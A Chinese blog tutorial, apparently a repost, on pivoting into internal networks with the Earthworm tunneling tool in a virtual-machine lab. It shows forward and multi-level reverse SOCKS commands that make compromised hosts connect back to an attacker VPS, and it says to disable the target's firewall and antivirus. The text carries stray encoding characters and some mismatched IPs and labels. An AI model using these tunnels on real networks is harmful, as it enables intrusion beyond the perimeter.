文章目錄
1. 一級(jí)代理:
2. 二級(jí)代理(一):
3. 二級(jí)代理(二):
1.1 場(chǎng)景:
1.2 網(wǎng)絡(luò)拓?fù)鋱D:
1.3 說明:
1.4 實(shí)驗(yàn)過程:
2.1 場(chǎng)景:
2.2 網(wǎng)絡(luò)拓?fù)鋱D:
2.3 說明:
2.4 實(shí)驗(yàn)過程:
3.1 場(chǎng)景:
3.2 網(wǎng)絡(luò)拓?fù)鋱D:
3.3 說明:
3.4 實(shí)驗(yàn)過程:
1. 場(chǎng)景:
2. 網(wǎng)絡(luò)拓?fù)鋱D:
3. 說明:
4. 實(shí)驗(yàn)過程:
一��、環(huán)境準(zhǔn)備:
二�����、工具:
三�、概念:
四���、學(xué)習(xí)目的:
五����、ew(Earthworm)介紹:
六�����、ew(Earthworm)使用說明:
七���、ew(Earthworm)正向代理(適用于被控服務(wù)器擁有一個(gè)公網(wǎng)IP):
八�、ew(Earthworm)反向代理:
一�����、環(huán)境準(zhǔn)備:
關(guān)閉靶機(jī)電腦的防火墻及病毒和威脅防護(hù)的實(shí)時(shí)防護(hù)�����。
開啟內(nèi)網(wǎng)主機(jī)的遠(yuǎn)程桌面���。
二����、工具:
ew(Earthworm)內(nèi)網(wǎng)穿透工具
proxifier代理工具客戶端
三����、概念:
內(nèi)網(wǎng)滲透不光只是反彈一個(gè)shell,反彈一個(gè)端口��,我們更需要對(duì)內(nèi)網(wǎng)進(jìn)行更深一步的掃描和滲透,這時(shí)候就需要找到一個(gè)代理服務(wù)器�,充當(dāng)外網(wǎng)和內(nèi)網(wǎng)數(shù)據(jù)轉(zhuǎn)發(fā)的節(jié)點(diǎn),通過這個(gè)被我們控制的服務(wù)器�,把所在網(wǎng)段的流量轉(zhuǎn)發(fā)到公網(wǎng)(互聯(lián)網(wǎng))。
所以出現(xiàn)了反彈代理,也叫反彈socket���。
四��、學(xué)習(xí)目的:
在我們進(jìn)行滲透測(cè)試過程中����,獲得了目標(biāo)服務(wù)器的getshell權(quán)限后����,要對(duì)內(nèi)網(wǎng)其它服務(wù)器或者主機(jī)進(jìn)一步滲透;這樣的話���,需要對(duì)其他主機(jī)進(jìn)行信息收集��,端口��、服務(wù)探測(cè)及漏洞掃描等操作���。
進(jìn)行這樣操作�����,只進(jìn)行反彈shell和端口轉(zhuǎn)發(fā)已經(jīng)不能滿足需求,需要進(jìn)一步進(jìn)行反彈代理��,通過我們控制的目標(biāo)服務(wù)器��,把目標(biāo)服務(wù)器作為代理服務(wù)器��,充當(dāng)外網(wǎng)和內(nèi)網(wǎng)數(shù)據(jù)轉(zhuǎn)發(fā)的節(jié)點(diǎn)���,把所在內(nèi)網(wǎng)網(wǎng)段的流量引出到公網(wǎng)��,這樣的話�����,就方便我們對(duì)目標(biāo)服務(wù)器所在內(nèi)網(wǎng)網(wǎng)段的其他主機(jī)進(jìn)行探測(cè)及漏洞利用了����。
五�����、ew(Earthworm)介紹:
EW 是一套便攜式的網(wǎng)絡(luò)穿透工具,具有 SOCKS v5服務(wù)架設(shè)和端口轉(zhuǎn)發(fā)兩大核心功能��,可在復(fù)雜網(wǎng)絡(luò)環(huán)境下完成網(wǎng)絡(luò)穿透��。
該工具能夠以“正向”�����、“反向”��、“多級(jí)級(jí)聯(lián)”等方式打通一條網(wǎng)絡(luò)隧道�,直達(dá)網(wǎng)絡(luò)深處,用蚯蚓獨(dú)有的手段突破網(wǎng)絡(luò)限制����,給防火墻松土。
工具包中提供了多種可執(zhí)行文件��,以適用不同的操作系統(tǒng)��,Linux���、Windows���、MacOS�、Arm-Linux 均被包括其內(nèi)�。
六、ew(Earthworm)使用說明:
該工具共有 6 種命令格式(ssocksd�、rcsocks、rssocks�����、lcx_slave�����、lcx_listen����、lcx_tran)�����。
D:\ew>ew_for_Win.exe -h
版本:free1.2
./xxx ([-options] [values])*
選項(xiàng) :
例如:./xxx -s ssocksd -h
-s 指定工作模式�����。工作模式支持如下:ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slavessocksd 創(chuàng)建正向socks代理服務(wù)端,監(jiān)聽在本地����,直接把當(dāng)前環(huán)境socks代理出去。rssocks 創(chuàng)建反向socks代理服務(wù)端rcsocks 反向socks代理客戶端lcx_tran 正向tcp端口轉(zhuǎn)發(fā)����,監(jiān)聽在本地lcx_slave 反向tcp轉(zhuǎn)發(fā)客戶端lcx_listen 反向tcp服務(wù)端-l listenport為服務(wù)器打開一個(gè)監(jiān)聽端口。
-d refhost 設(shè)置反射主機(jī)地址��。
-e refport 設(shè)置反射端口����。
-f connhost 設(shè)置連接主機(jī)地址。
-g connport 設(shè)置連接端口�����。
-h help 顯示幫助文本��,通過添加 -s 參數(shù)�����,您還可以查看更詳細(xì)的幫助�����。
-a about 顯示關(guān)于頁(yè)面
-v version 顯示版本。
-t usectime 設(shè)置超時(shí)的毫秒數(shù)����。 默認(rèn)的值為 1000
可以參考:http://rootkiter.com/EarthWorm/
七、ew(Earthworm)正向代理(適用于被控服務(wù)器擁有一個(gè)公網(wǎng)IP):
1. 場(chǎng)景:
目標(biāo)網(wǎng)絡(luò)邊界服務(wù)器存在公網(wǎng)IP且可任意開監(jiān)聽端口�。
| 角色 | 系統(tǒng) | 網(wǎng)卡 | IP(網(wǎng)段) |
|---|
| 攻擊機(jī) | windows10虛擬機(jī) | NAT | 192.168.100.151 |
| 被控主機(jī)1 | windows08虛擬機(jī) | NAT
VMnet1 | 192.168.100.158(公網(wǎng)IP)
172.16.10.10 |
| 內(nèi)網(wǎng)主機(jī) | windows03虛擬機(jī) | VMnet1 | 172.16.10.11 |
2. 網(wǎng)絡(luò)拓?fù)鋱D:
3. 說明:
正向代理是服務(wù)器開放監(jiān)聽端口,客戶端(攻擊者)主動(dòng)連接服務(wù)器的端口�����。
適用于被控服務(wù)器擁有一個(gè)公網(wǎng)IP�。
4. 實(shí)驗(yàn)過程:
1�����、在被控主機(jī)使用ew打開一個(gè)監(jiān)聽端口:
命令:
ew_for_Win.exe -s ssocksd -l 6666
-s 指定工作模式
ssocksd 創(chuàng)建正向socks代理服務(wù)端����,監(jiān)聽在本地,直接把當(dāng)前環(huán)境socks代理出去
-l listenport為服務(wù)器打開一個(gè)監(jiān)聽端口
2�、查看監(jiān)聽端口是否打開,可以看出監(jiān)聽端口已經(jīng)打開:
3�、使用proxifier代理工具客戶端連接ew(Earthworm)的正向連接服務(wù)端:
在進(jìn)行測(cè)試時(shí)可以出現(xiàn)無(wú)法連通的現(xiàn)象,這時(shí)需要在【被控主機(jī)1】的ew命令行里面敲一下回車鍵:
4、在攻擊機(jī)上面連接被控服務(wù)器所在內(nèi)網(wǎng)段的內(nèi)網(wǎng)主機(jī)172.16.10.11:
八���、ew(Earthworm)反向代理:
1. 一級(jí)代理:
1.1 場(chǎng)景:
目標(biāo)網(wǎng)絡(luò)邊界不存在公網(wǎng)IP����,能夠訪問內(nèi)網(wǎng)資源���,可以訪問公網(wǎng)��,需要通過反彈方式創(chuàng)建 socks 代理���。
| 角色 | 系統(tǒng) | 網(wǎng)卡 | IP(網(wǎng)段) |
|---|
| 攻擊機(jī) | windows10虛擬機(jī) | NAT | 192.168.100.151 |
| 攻擊者的公網(wǎng)vps | windows10虛擬機(jī) | NAT | 192.168.100.152 |
| 被控主機(jī)1 | windows08虛擬機(jī) | NAT
VMnet1 | 192.168.100.158
172.16.10.10 |
| 內(nèi)網(wǎng)主機(jī) | windows03虛擬機(jī) | VMnet1 | 172.16.10.11 |
1.2 網(wǎng)絡(luò)拓?fù)鋱D:
1.3 說明:
反向代理是客戶端開發(fā)端口,服務(wù)器連接客戶端���。
適用于目標(biāo)機(jī)器沒有公網(wǎng)IP��,但可訪問內(nèi)網(wǎng)資源��。
1.4 實(shí)驗(yàn)過程:
1�、在攻擊者的公網(wǎng)vps上添加轉(zhuǎn)接隧道�,將6666收到的代理請(qǐng)求轉(zhuǎn)交給反連8888端口的被控服務(wù)器:
命令:
ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s 指定工作模式
rcsocks 反向socks代理客戶端
-l listenport在代理客戶端設(shè)置監(jiān)聽端口,將6666收到的 代理請(qǐng)求 轉(zhuǎn)交給反連8888端口的被控服務(wù)器���。
-e refport設(shè)置反彈端口�,用于接收被控服務(wù)器反彈過來的代理流量。
2����、在被控服務(wù)器上啟動(dòng)SOCKS v5服務(wù)并反彈到公網(wǎng)vps主機(jī)的8888端口
:
命令:
ew_for_Win.exe -s rssocks -d 192.168.100.152 -e 8888
-s 指定工作模式
rssocks 創(chuàng)建反向socks代理服務(wù)端
-d refhost設(shè)置反彈主機(jī)地址(IP)。
-e refport設(shè)置反彈端口�����,反彈給公網(wǎng)vps開啟的8888端口����。
3、在公網(wǎng)vps出現(xiàn)以下界面�����,說明連接成功:
4�����、使用proxifier代理工具客戶端連接公網(wǎng)vps上ew(Earthworm)的監(jiān)聽的端口:
在進(jìn)行測(cè)試時(shí)可以出現(xiàn)無(wú)法連通的現(xiàn)象���,這時(shí)需要在【攻擊者的公網(wǎng)vps】的ew命令行里面敲一下回車鍵:
5�、在攻擊機(jī)上面連接被控服務(wù)器所在內(nèi)網(wǎng)段的內(nèi)網(wǎng)主機(jī)172.16.10.11:
2. 二級(jí)代理(一):
2.1 場(chǎng)景:
在獲得邊界服務(wù)器【被控主機(jī)1】的webshell后����,通過橫向移動(dòng)到內(nèi)網(wǎng)環(huán)境1中的【被控主機(jī)2】,發(fā)現(xiàn)【被控主機(jī)2】同時(shí)處于另一個(gè)內(nèi)網(wǎng)環(huán)境2中���,但【被控主機(jī)2】所處的內(nèi)網(wǎng)環(huán)境2無(wú)法訪問公網(wǎng)�,公網(wǎng)也無(wú)法訪問【被控主機(jī)2】所在內(nèi)網(wǎng)環(huán)境2 �,【被控主機(jī)2】卻可以單向訪問【被控主機(jī)1】,這時(shí)需要把【被控主機(jī)2】所在的內(nèi)網(wǎng)環(huán)境2的流量代理出來��。
| 角色 | 系統(tǒng) | 網(wǎng)卡 | IP(網(wǎng)段) |
|---|
| 攻擊機(jī) | windows10虛擬機(jī) | NAT | 192.168.100.151 |
| 攻擊者的公網(wǎng)vps | windows10虛擬機(jī) | NAT | 192.168.100.152 |
| 被控主機(jī)1 | windows08虛擬機(jī) | NAT
VMnet1 | 192.168.100.158
172.16.10.10 |
| 被控主機(jī)2 | windows08虛擬機(jī) | VMnet1
VMnet2 | 172.16.10.11
10.1.1.1 |
| 內(nèi)網(wǎng)主機(jī) | windows03虛擬機(jī) | VMnet1 | 172.16.10.11 |
2.2 網(wǎng)絡(luò)拓?fù)鋱D:
2.3 說明:
反向代理是客戶端開發(fā)端口�����,服務(wù)器連接客戶端���。
適用于目標(biāo)機(jī)器沒有公網(wǎng)IP����,但可訪問內(nèi)網(wǎng)資源�����。
2.4 實(shí)驗(yàn)過程:
1、在公網(wǎng)vps添加轉(zhuǎn)接隧道�����,將6666端口收到的代理請(qǐng)求流量轉(zhuǎn)交給反連8888端口的被控主機(jī):
命令:
ew_for_Win.exe -s rcsocks -l 6666 -e 8888
-s 指定工作模式
rcsocks 反向socks代理客戶端
-l listenport在代理客戶端設(shè)置監(jiān)聽端口���,將6666收到的 代理請(qǐng)求 轉(zhuǎn)交給反連8888端口的被控服務(wù)器�����。
-e refport設(shè)置反彈端口���,用于接收被控服務(wù)器反彈過來的代理流量。
2���、在被控服主機(jī)1上啟動(dòng)監(jiān)聽本機(jī)端口9999����,并將9999端口接收到的代理流量��,轉(zhuǎn)發(fā)給攻擊者的公網(wǎng)vps的8888端口:
命令:
ew_for_Win.exe -s lcx_tran -l 被控主機(jī)1本機(jī)端口 -f 攻擊者的公網(wǎng)vps_IP -g 8888ew_for_Win.exe -s lcx_tran -l 9999 -f 192.168.100.152 -g 8888-s 指定工作模式
rssocks 創(chuàng)建反向socks代理服務(wù)端
-l listenport在被控主機(jī)1上設(shè)置監(jiān)聽端口9999�����,將9999收到的 代理請(qǐng)求 轉(zhuǎn)交給攻擊者的公網(wǎng)vps的8888端口�。
-f connhost 設(shè)置連接主機(jī)地址(IP)。
-g connport 設(shè)置連接端口�。
這個(gè)命令的意思就是,把本機(jī)9999接收到的代理流量��,轉(zhuǎn)發(fā)到攻擊者公網(wǎng)vps的192.168.100.152的8888端口上����。
3、在被控主機(jī)2啟動(dòng)SOCKS v5代理服務(wù)端��,并反彈到被控主機(jī)1的8888端口 :
ew_for_Win.exe -s rssocks -d 172.16.10.10 -e 9999
-s 指定工作模式
rssocks 創(chuàng)建反向socks代理服務(wù)端
-d refhost設(shè)置反彈主機(jī)地址(IP)���。
-e refport設(shè)置反彈端口���,反彈給公網(wǎng)vps開啟的8888端口。
這個(gè)命令的意思就是在被控主機(jī)2啟動(dòng)SOCKS v5代理服務(wù)端�����,把本機(jī)的代理流量反向代理到被控服務(wù)器1的9999端口�。
4、使用proxifier代理工具客戶端連接公網(wǎng)vps上ew(Earthworm)的監(jiān)聽的端口:
5����、在攻擊機(jī)上面連接第二級(jí)內(nèi)網(wǎng)被控主機(jī)所在內(nèi)網(wǎng)段的內(nèi)網(wǎng)主機(jī)10.1.1.2:
3. 二級(jí)代理(二):
3.1 場(chǎng)景:
在獲得邊界服務(wù)器【被控主機(jī)1】的webshell后�����,發(fā)現(xiàn)被控主機(jī)1沒有公網(wǎng)IP���,但處于邊界的【被控主機(jī)1】可訪問公網(wǎng);攻擊者通過橫向移動(dòng)到內(nèi)網(wǎng)環(huán)境1中的【被控主機(jī)2】��,發(fā)現(xiàn)【被控主機(jī)2】同時(shí)處于另一個(gè)內(nèi)網(wǎng)環(huán)境2中��,但【被控主機(jī)2】所處的內(nèi)網(wǎng)環(huán)境2無(wú)法訪問公網(wǎng)�����,公網(wǎng)也無(wú)法訪問【被控主機(jī)2】所在內(nèi)網(wǎng)環(huán)境2 �,但處于邊界的【被控主機(jī)1】卻可以單向訪問【被控主機(jī)2】所處的內(nèi)網(wǎng)環(huán)境2,這時(shí)需要把【被控主機(jī)2】所在的內(nèi)網(wǎng)環(huán)境2的流量代理出來��。
| 角色 | 系統(tǒng) | 網(wǎng)卡 | IP(網(wǎng)段) |
|---|
| 攻擊機(jī) | windows10虛擬機(jī) | NAT | 192.168.100.151 |
| 攻擊者的公網(wǎng)vps | windows10虛擬機(jī) | NAT | 192.168.100.152 |
| 被控主機(jī)1 | windows08虛擬機(jī) | NAT
VMnet1 | 192.168.100.158
172.16.10.10 |
| 被控主機(jī)2 | windows08虛擬機(jī) | VMnet1
VMnet2 | 172.16.10.11
10.1.1.1 |
| 內(nèi)網(wǎng)主機(jī) | windows03虛擬機(jī) | VMnet1 | 10.1.1.2 |
3.2 網(wǎng)絡(luò)拓?fù)鋱D:
3.3 說明:
反向代理是客戶端開發(fā)端口�,服務(wù)器連接客戶端。
適用于目標(biāo)機(jī)器沒有公網(wǎng)IP���,但可訪問內(nèi)網(wǎng)資源��。
3.4 實(shí)驗(yàn)過程:
1���、在攻擊者的公網(wǎng)vps添加轉(zhuǎn)接隧道,通過ew的lcx_listen模塊監(jiān)聽本機(jī)的6666端口��,把6666端口接受到的代理請(qǐng)求�����,轉(zhuǎn)發(fā)到反連8888端口的主機(jī):
命令:
ew_for_Win.exe -s lcx_listen -l 6666 -e 8888
-s 指定工作模式
lcx_listen 反向tcp服務(wù)端
-l listenport在代理客戶端設(shè)置監(jiān)聽端口�����,將6666收到的 代理請(qǐng)求 轉(zhuǎn)交給反連8888端口的被控服務(wù)器�。
-e refport設(shè)置反彈端口,用于接收被控服務(wù)器反彈過來的代理流量��。
2��、在內(nèi)網(wǎng)環(huán)境2中的【被控主機(jī)2】上通過ssocksd模塊���,開啟正向代理服務(wù)����,通過ssocksd模塊監(jiān)聽【被控主機(jī)2】本機(jī)的9999端口,通過正向代理���,把外流量引向內(nèi)網(wǎng):
命令:
ew_for_Win.exe -s ssocksd -l 9999
-s 指定工作模式
ssocksd 創(chuàng)建正向socks代理服務(wù)端�����,監(jiān)聽在本地�����,直接把當(dāng)前環(huán)境socks代理出去
-l listenport為服務(wù)器打開一個(gè)監(jiān)聽端口
3����、在內(nèi)網(wǎng)環(huán)境1中的被控主機(jī)1運(yùn)行以下命令���,通過ew的lcx_slave流量轉(zhuǎn)發(fā)模塊�����,將正向連接到攻擊者的公網(wǎng)vps的8888端口��,而獲得的代理請(qǐng)求流量���,轉(zhuǎn)發(fā)給內(nèi)網(wǎng)環(huán)境2的【被控主機(jī)2】�����,從而獲得內(nèi)網(wǎng)環(huán)境2的內(nèi)網(wǎng)流量:
ew_for_Win.exe -s lcx_slave -d 攻擊者的公網(wǎng)vps_IP -e 8888 -f 處于2級(jí)內(nèi)網(wǎng)的被控主機(jī) -g 9999
ew_for_Win.exe -s lcx_slave -d 192.168.100.152 -e 8888 -f 172.16.10.11 -g 9999
-s 指定工作模式
lcx_slave 反向tcp轉(zhuǎn)發(fā)客戶端
-d refhost設(shè)置反彈主機(jī)地址(IP)。
-e refport設(shè)置反彈端口�����,反彈給公網(wǎng)vps開啟的8888端口
-f connhost 設(shè)置連接主機(jī)地址
-g connport 設(shè)置連接端口
4����、使用proxifier代理工具客戶端連接公網(wǎng)vps上ew(Earthworm)的監(jiān)聽的端口:
5、在攻擊機(jī)上面連接第二級(jí)內(nèi)網(wǎng)被控主機(jī)所在內(nèi)網(wǎng)段的內(nèi)網(wǎng)主機(jī)10.1.1.2:
文章來源:https://blog.csdn.net/weixin_45588247/article/details/120238795
該文章在 2023/10/23 18:48:34 編輯過
400 186 1886
